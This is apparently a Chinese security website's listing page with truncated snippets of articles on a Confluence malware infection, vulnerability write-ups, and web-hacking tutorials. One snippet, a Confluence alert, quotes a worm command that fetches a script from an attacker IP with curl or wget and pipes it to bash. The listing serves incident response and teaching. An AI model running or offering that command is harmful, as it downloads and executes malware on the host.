51工具盒子
confluence 漏洞中毒 排查案例
**现象:** 新接手的一台wiki服务器, 听同事说,机器中过病毒,没清理干净,还是有问题的。 我总结了几次规律。 每次到周二上午的时候,服务器CPU 爆满, 导致其他服务终止, SSH登录就出现问题。 问题: 2023年8月29日上午9点10分 周二 1. 进程里有有个kk.x86的进程 2. 有一个/tmp/kk.x86的文件 3. MySql会挂掉 ...
白嫖帮
confluence 漏洞
高危蠕虫下载命令执行(wget\&curl) 命令行 bash -c (curl -s 194.38.22.53/cf.sh||wget -q -O- 194.38.22.53/cf.sh)|bash 父进程命令行 /opt/atlassian/confluence/jre//bin/java -Djava.util.logging.con...
Diffie-Hellman Key Agreement Protocol 资源管理错误漏洞(CVE-2002-20001)
Diffie-Hellman Key Agreement Protocol 资源管理错误漏洞(CVE-2002-20001) ### 漏洞描述: Diffie-Hellman Key Agreement Protocol是一种密钥协商协议。它最初在 Diffie 和 Hellman 关于公钥密码学的开创性论文中有所描述。该密钥协商协议允许 Alice 和 Bob 交换公钥值...
【漏洞已修复】永劫无间客户端RCE漏洞
0x00前言 {#0x00%E5%89%8D%E8%A8%804953} ==================================== 相信大家之前都看过我博客这篇添加了密码。距离发现这个漏洞已经一年多了, 这个漏洞现在已经修复了遂把他公开出来给大家学习一下。其实蛮简单的\~\~\~ (PS:本文单纯讲漏洞。不涉及实战利用) 0x01 正文 {#0x01...
记一次众测项目中绕过*盾拿下高危漏洞
0x00前言 {#0x00%E5%89%8D%E8%A8%804919} ==================================== **本篇文章作者YanXia,本文属i春秋原创奖励计划<https://bbs.ichunqiu.com/thread-63286-1-1.html>,未经许可禁止转载。** **注意:本次渗透为授权项目,所涉及漏洞...
记一次众测项目中APP漏洞挖掘
0x00前言 {#0x00%E5%89%8D%E8%A8%808164} ==================================== **本篇文章作者YanXia,本文属i春秋原创奖励计划<https://bbs.ichunqiu.com/thread-63287-1-1.html>,未经许可禁止转载。** **注意:本次渗透为授权项目,所涉及漏洞...
【漏洞学习】挖掘CSRF漏洞
0x00前言 {#0x00%E5%89%8D%E8%A8%801628} ------------------------------------ 上半年就说要写怎么挖csrf漏洞了,主要是懒....后面就忘记写了。今天正好有人问到,索性就写一篇文章出来 0x01 什么是CSRF {#0x01+%E4%BB%80%E4%B9%88%E6%98%AFCSRF7275} ---...
实战挖掘短信轰炸漏洞(Burp系列教程)
**本次教程来自YanXia,转载请注明作者信息,博客地址<http://www.535yx.cn>,感谢** 0x00 引言 {#0x00+%E5%BC%95%E8%A8%804722} -------------------------------------- 短信轰炸漏洞属于web程序中的逻辑漏洞,随着互联网技术与电子商务的不断发展与,互联网所带来的安全...
web漏洞实战讲解视频教程
第一章:基础篇 第二章:SQL注入攻击 第三章:XSS漏洞 第四章:上传漏洞 第五章:CSRF漏洞 第六章:文件包含 第七章:验证码绕过 第八章:命令执行 第九章:其他漏洞 第十章:综合漏洞分析 
记一次代码审计拿下CNVD证书
0x00前言 {#0x00%E5%89%8D%E8%A8%803265} ==================================== **本篇文章作者YanXia,本文属i春秋原创奖励计划,未经许可禁止转载。地址<https://bbs.ichunqiu.com/thread-63302-1-1.html>** 去年的时候,想给学弟刷一点CNV...
